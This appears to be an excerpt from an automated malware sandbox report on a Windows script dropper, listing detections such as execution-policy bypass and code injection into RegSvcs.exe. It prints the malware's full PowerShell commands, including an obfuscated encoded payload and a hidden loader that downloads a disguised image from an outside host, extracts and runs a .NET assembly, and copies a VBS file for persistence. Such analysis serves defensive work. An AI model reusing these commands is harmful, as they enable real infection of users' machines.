Source: wscript.exe, 00000000.00000002.2315993674.000001EA1081A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315405942.000001EA0E68E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA1081A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313245780.000001EA0E68C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000E.00000003.2666759535.00000138EAF0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2667454739.00000138EAF13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2761827184.000001D5FAEE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2761189665.000001D5FAEDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" rt></Analy
Source: wscript.exe, 0000000F.00000003.2761189665.000001D5FAEDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntEl*$output += "(Get-VMNetworkAdapter -all)"; GetEpn
Source: RegSvcs.exe, 0000000B.00000002.3361493262.0000000000D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 0000000E.00000003.2666759535.00000138EAF0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2667454739.00000138EAF13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2761827184.000001D5FAEE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2761189665.000001D5FAEDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iJOpti`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" act

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 172.67.19.24 443

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_1672.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9FD008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'c:\programdata\' , 'moquenqueiro','regsvcs',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'c:\programdata\' , 'moquenqueiro','regsvcs',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
